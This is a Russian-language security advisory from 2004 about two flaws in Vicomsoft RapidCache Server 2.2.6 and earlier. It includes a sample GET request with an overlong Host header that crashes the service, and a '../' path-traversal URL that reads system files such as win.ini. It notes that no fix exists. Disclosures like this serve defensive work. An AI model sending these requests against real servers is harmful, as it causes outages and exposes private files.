Несколько уязвимостей в RapidCache

Дата публикации:
20.01.2004
Всего просмотров:
878
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Локальная сеть
Воздействие:
Отказ в обслуживании
Раскрытие важных данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Vicomsoft RapidCache Server 2.x
Уязвимые версии: RapidCache 2.2.6 и более ранние версии

Описание: Две уязвимости обнаружены в RapidCache. Удаленный пользователь аварийно завершить работу службы. Удаленный пользователь может также просматривать файлы на системе.

Удаленный пользователь может послать HTTP GET запрос с длинным параметром 'Host', чтобы аварийно завершить работу RapidCache сервера. Пример:

GET / HTTP/1.1
Accept: */*..Accept-Language: en-gb
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0
Host:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb
bbbbbbbbbbbbbbbc cccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
cccccddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddd dddddddddddddddddddddeeeeeeeeeeeeBBBBXXX
X:8080
Connection: Keep-Alive
Также сообщается, что удаленный пользователь может представить специально обработанный URL, содержащий '../', чтобы просмотреть произвольные файлы на системе. Пример:
 http://127.0.0.1:8080/../../../../../../../../windows/win.ini

URL производителя: http://www.vicomsoft.com/rapidcache/rapidcache.main.html

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: RapidCache Multiple Vulnerabilities

или введите имя

CAPTCHA